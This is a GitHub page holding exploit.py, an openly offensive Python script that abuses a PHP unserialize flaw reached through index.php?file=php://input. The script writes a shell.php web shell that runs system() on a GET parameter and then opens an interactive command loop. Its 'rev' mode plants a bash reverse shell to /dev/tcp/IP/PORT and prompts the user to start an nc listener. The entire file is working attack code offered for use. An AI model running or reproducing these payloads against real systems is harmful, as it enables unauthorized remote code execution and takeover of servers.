unserialize-exploit/exploit.py at exploit · dr4xp/unserialize-exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests
import sys
import time

# CHANGE THIS TO YOUR TARGET
base_url = "http://TARGET/<HIDDEN DIRECTORY>/"
index_url = base_url + "index.php?file=php://input"
shell_url = base_url + "shell.php"

# Basic command-exec webshell
webshell_payload = 'O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET[\'cmd\']); ?>";}'

def make_revshell(ip, port):
    php = f"<?php system('bash -c \"bash -i >& /dev/tcp/{ip}/{port} 0>&1\"'); ?>"
    return (
        f'O:4:"file":2:{{s:4:"file";s:9:"shell.php";'
        f's:4:"data";s:{len(php)}:"{php}";}}'
    )

def interactive_shell():
    print("[*] Starting interactive shell. Type 'exit' or 'quit' to close shell.")
    while True:
        cmd = input("$ ")
        if cmd.strip().lower() in ["exit", "quit"]:
            exit(0)
        r = requests.get(shell_url, params={"cmd": cmd})
        print(r.text)

def deploy(payload):
    r = requests.post(index_url, data=payload)
    if r.status_code == 200:
        print("[+] Payload deployed.")
    else:
        print("[-] Failed, status:", r.status_code)

def trigger_shell():
    print("[*] Triggering shell...")
    try:
        requests.get(shell_url, timeout=2)
    except requests.exceptions.ReadTimeout:
        # normal, connection hijacked by reverse shell
        pass
    print("[+] If all went well, check your nc listener!")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage:")
        print(f"  python3 exploit.py shell        # deploy command shell")
        print(f"  python3 exploit.py rev IP PORT  # reverse shell")
        sys.exit(0)

    if sys.argv[1] == "rev":
        ip, port = sys.argv[2], int(sys.argv[3])
        payload = make_revshell(ip, port)
        print(f"[*] Deploying reverse shell to {ip}:{port} ...")
        deploy(payload)
        print(f"[*] Start listener with: nc -lvnp {port}")
        time.sleep(2)
        trigger_shell()

    if sys.argv[1] == 'shell':
        print("[*] Deploying webshell...")
        deploy(webshell_payload)
        interactive_shell()